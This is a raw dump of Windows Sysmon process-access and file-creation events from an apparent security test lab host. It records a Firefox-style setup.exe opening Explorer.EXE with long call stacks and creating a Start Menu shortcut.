13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 11241100x800000000000000016345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk2021-01-18 13:59:53.380 10341000x800000000000000016344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\